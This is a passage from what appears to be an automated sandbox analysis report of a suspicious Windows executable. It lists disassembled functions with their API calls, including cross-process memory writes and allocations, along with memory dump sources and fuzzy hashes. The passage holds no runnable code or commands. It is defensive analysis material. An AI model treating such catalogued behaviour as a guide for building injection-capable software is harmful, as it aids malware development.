                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0324
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0331
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F033E
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F034B
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0358
                                      • CloseHandle.KERNEL32(?,?,?,?,008F017D,?,008F32FC,?,00000001,008C2592,?), ref: 008F0365
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 86cc8647afec7b11613ff47499c9f0792f5b4f62f2aa40dc65d1d04f1ef5d3d7
                                      • Instruction ID: 9adc845cc69336650d192eef3db4b3ed2ad06894ae4e25b88fede564e1ab4985
                                      • Opcode Fuzzy Hash: 86cc8647afec7b11613ff47499c9f0792f5b4f62f2aa40dc65d1d04f1ef5d3d7
                                      • Instruction Fuzzy Hash: 8F01A272800B199FC7309F66D880822F7F5FF503153158A3FD29692A32C371A955DF80
                                      Function 008BD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 008BD752
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008BD764
                                      • _free.LIBCMT ref: 008BD776
                                      • _free.LIBCMT ref: 008BD788
                                      • _free.LIBCMT ref: 008BD79A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: cd7f2af3f5b828f2bf0d15fc4cb3cb52c039165c97d1b13749d380c5315126ad
                                      • Instruction ID: 8f462fdf409c519d11c6e35b488cf8a6a0844bf06594cf2e6758d3cefc09afb8
                                      • Opcode Fuzzy Hash: cd7f2af3f5b828f2bf0d15fc4cb3cb52c039165c97d1b13749d380c5315126ad
                                      • Instruction Fuzzy Hash: 47F0F97655A308BB8665EB68F9C6DDA7BDDFB45710BA40C05F048E7702DB20FC808A69
                                      Function 008E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 008E5C58
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 008E5C6F
                                      • MessageBeep.USER32(00000000), ref: 008E5C87
                                      • KillTimer.USER32(?,0000040A), ref: 008E5CA3
                                      • EndDialog.USER32(?,00000001), ref: 008E5CBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 085b300f09f864d4973d59aeb019445520f47cf99e58f14ee45059f26d2e5b98
                                      • Instruction ID: 4b24ede05611f118bcb5f986b239f2afd0db40b1cc09bbe53f06d5cf6ee4fd73
                                      • Opcode Fuzzy Hash: 085b300f09f864d4973d59aeb019445520f47cf99e58f14ee45059f26d2e5b98
                                      • Instruction Fuzzy Hash: B801F470640B04ABEB205B11DD5EFE677B8FF05B49F000159B283E10E1DBF4A984DB90
                                      Function 008B22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 008B22BE
                                        • Part of subcall function 008B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000), ref: 008B29DE
                                        • Part of subcall function 008B29C8: GetLastError.KERNEL32(00000000,?,008BD7D1,00000000,00000000,00000000,00000000,?,008BD7F8,00000000,00000007,00000000,?,008BDBF5,00000000,00000000), ref: 008B29F0
                                      • _free.LIBCMT ref: 008B22D0
                                      • _free.LIBCMT ref: 008B22E3
                                      • _free.LIBCMT ref: 008B22F4
                                      • _free.LIBCMT ref: 008B2305
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b0c9ff87da569c60488d0ca5a6914d3d98192d24089c04d1a3ba1364dbd0694f
                                      • Instruction ID: 094db9b7b112ca395bcb75fc37a46cd72ef30f22e4d289523c8d2f1140431dce
                                      • Opcode Fuzzy Hash: b0c9ff87da569c60488d0ca5a6914d3d98192d24089c04d1a3ba1364dbd0694f
                                      • Instruction Fuzzy Hash: 3BF0F4B54293109FC652AF59BC01E983F65F719752B050A06F818D6371C7310555BFE6
                                      Function 008995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 008995D4
                                      • StrokeAndFillPath.GDI32(?,?,008D71F7,00000000,?,?,?), ref: 008995F0
                                      • SelectObject.GDI32(?,00000000), ref: 00899603
                                      • DeleteObject.GDI32 ref: 00899616
                                      • StrokePath.GDI32(?), ref: 00899631
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: e73b13ac8cbf16f8b3401d4065b0deca717b4abcfb9cc247f25d8b164361014a
                                      • Instruction ID: bee4a5ec1d1f31c6bfad2a53be1ffaa83be4d12818451adde1a9b22591861d4b
                                      • Opcode Fuzzy Hash: e73b13ac8cbf16f8b3401d4065b0deca717b4abcfb9cc247f25d8b164361014a
                                      • Instruction Fuzzy Hash: 75F0F67016D308EBDB126F6AFD287A93B61FB15363F088218E4A5950F0C7308991EF64
                                      Function 008E1874 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008E187F
                                      • CloseHandle.KERNEL32(?), ref: 008E1894
                                      • CloseHandle.KERNEL32(?), ref: 008E189C
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008E18A5
                                      • HeapFree.KERNEL32(00000000), ref: 008E18AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                      • String ID:
                                      • API String ID: 3751786701-0
                                      • Opcode ID: 7cb8e35eec3a947cfc24c5c257846f8c5574612d6318938ce1e8b57a4e4f5cf0
                                      • Instruction ID: 53fa4ed2106f68cbf4abde07d7bddfb58067d64d9481d39f548b18be04cdae87
                                      • Opcode Fuzzy Hash: 7cb8e35eec3a947cfc24c5c257846f8c5574612d6318938ce1e8b57a4e4f5cf0
                                      • Instruction Fuzzy Hash: A6E0EDB669C211BBD7015FA1ED0C985BF39FF49721750C220F22581070CB725421EF50
                                      Function 008B0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: __freea$_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 3432400110-3206640213
                                      • Opcode ID: d37a70634484d706aff039986c77e9f2467fa5d58c2abdcddc2f446e03ff6600
                                      • Instruction ID: 357069228142d3a2a177b64138ce1e005bcbf63e61a85bda51c2303d2a0f8247
                                      • Opcode Fuzzy Hash: d37a70634484d706aff039986c77e9f2467fa5d58c2abdcddc2f446e03ff6600
                                      • Instruction Fuzzy Hash: 0AD1C13190020A9ADF249F68C86DAFABBB1FF09704FA84159E501DFB50E7799D81CB91
                                      Function 008F910C Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00887620: _wcslen.LIBCMT ref: 00887625
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • _wcslen.LIBCMT ref: 008F9506
                                      • _wcslen.LIBCMT ref: 008F952D
                                      • 7516D1A0.COMDLG32(00000058), ref: 008F9585
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$7516
                                      • String ID: X
                                      • API String ID: 252919825-3081909835
                                      • Opcode ID: 038ad818f3b251deeac63ab0c2d5a018f9c761eec5783c84a81cedf3768db0e4
                                      • Instruction ID: a75c0a0f043c24e44913911e412ef62bac7329ade80fefc09aa83650b303e98c
                                      • Opcode Fuzzy Hash: 038ad818f3b251deeac63ab0c2d5a018f9c761eec5783c84a81cedf3768db0e4
                                      • Instruction Fuzzy Hash: F6E181715083058FD724EF28C881B6AB7E4FF85314F14856DE999DB2A2DB31ED05CB92
                                      Function 00907B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008A0242: RtlEnterCriticalSection.NTDLL(0095070C), ref: 008A024D
                                        • Part of subcall function 008A0242: RtlLeaveCriticalSection.NTDLL(0095070C), ref: 008A028A
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                        • Part of subcall function 008A00A3: __onexit.LIBCMT ref: 008A00A9
                                      • __Init_thread_footer.LIBCMT ref: 00907BFB
                                        • Part of subcall function 008A01F8: RtlEnterCriticalSection.NTDLL(0095070C), ref: 008A0202
                                        • Part of subcall function 008A01F8: RtlLeaveCriticalSection.NTDLL(0095070C), ref: 008A0235
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                      • String ID: 5$G$Variable must be of type 'Object'.
                                      • API String ID: 535116098-3733170431
                                      • Opcode ID: f4b8a98c5530680f88b6bd58af64dcda697a7bf9680fc004aecb23bac93d1965
                                      • Instruction ID: 72aeb5441c1d2cd46e35cba68fa043e6fbea041c68f39476d237e1ae2ea6ebbf
                                      • Opcode Fuzzy Hash: f4b8a98c5530680f88b6bd58af64dcda697a7bf9680fc004aecb23bac93d1965
                                      • Instruction Fuzzy Hash: B9919A70A04209EFCB14EF98D8819BEB7B5FF49310F148459F846AB2D2DB71AE81CB51
                                      Function 008E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E21D0,?,?,00000034,00000800,?,00000034), ref: 008EB42D
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008E2760
                                        • Part of subcall function 008EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 008EB3F8
                                        • Part of subcall function 008EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 008EB355
                                        • Part of subcall function 008EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008E2194,00000034,?,?,00001004,00000000,00000000), ref: 008EB365
                                        • Part of subcall function 008EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008E2194,00000034,?,?,00001004,00000000,00000000), ref: 008EB37B
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E27CD
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008E281A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6e9c9a862e1a8e598f978f1c990c8ec9c77c31d881a38d28fb8f7e6aac189671
                                      • Instruction ID: 2e7800529742407eb754b01d8f0f1028c9c96caf595f414bef8b146b6b228c6d
                                      • Opcode Fuzzy Hash: 6e9c9a862e1a8e598f978f1c990c8ec9c77c31d881a38d28fb8f7e6aac189671
                                      • Instruction Fuzzy Hash: 26411D72900218BFDB10DBA9CD46ADEBBB8FF0A700F104055FA55B7181DB706E45CBA1
                                      Function 008B172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SAL987656700.exe,00000104), ref: 008B1769
                                      • _free.LIBCMT ref: 008B1834
                                      • _free.LIBCMT ref: 008B183E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\SAL987656700.exe
                                      • API String ID: 2506810119-229385648
                                      • Opcode ID: ec13a0e81c84c12ab6dec53dfd9a2407110248ce2d99e9ef7d9bc5ecbc43845c
                                      • Instruction ID: ddba342ff9c5e9a58590e9856f3e6a5eb6ef518c31694187e4a2741bb905d48e
                                      • Opcode Fuzzy Hash: ec13a0e81c84c12ab6dec53dfd9a2407110248ce2d99e9ef7d9bc5ecbc43845c
                                      • Instruction Fuzzy Hash: 96318E71A44218ABDF21DF999889EDEBBFCFB85310F504166F814DB311DA708E40DB91
                                      Function 008EC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008EC306
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 008EC34C
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00951990,01045AF0), ref: 008EC395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 53c067321636d91abb4d04e282b46e38aba478ea3c209dc7d5bec7d25492a5f4
                                      • Instruction ID: c83f7f55a2ddd82cd8f5b25d588049ae9d07a0a2962c28545a9f9cd3a2a92fb7
                                      • Opcode Fuzzy Hash: 53c067321636d91abb4d04e282b46e38aba478ea3c209dc7d5bec7d25492a5f4
                                      • Instruction Fuzzy Hash: 41418E71608381AFD720DF2AD844B5BBBA8FB86314F04861DF9A5D73D1D730A905CB62
                                      Function 00914416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0091CC08,00000000,?,?,?,?), ref: 009144AA
                                      • GetWindowLongW.USER32 ref: 009144C7
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009144D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: cfcb732d9b54c019aa6ec4643d50ac387f560d189743552a173bd04cea866852
                                      • Instruction ID: e7fa08f033c213ca666279565c3425ba940e702dcd29e6a72e2116a6adfe790d
                                      • Opcode Fuzzy Hash: cfcb732d9b54c019aa6ec4643d50ac387f560d189743552a173bd04cea866852
                                      • Instruction Fuzzy Hash: 01319A72314609ABDF209E38DC45BEA7BAAEB08334F204725F975A21E0D770AC909B50
                                      Function 0090304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0090335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00903077,?,?), ref: 00903378
                                      • inet_addr.WS2_32(?), ref: 0090307A
                                      • _wcslen.LIBCMT ref: 0090309B
                                      • htons.WS2_32(00000000), ref: 00903106
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
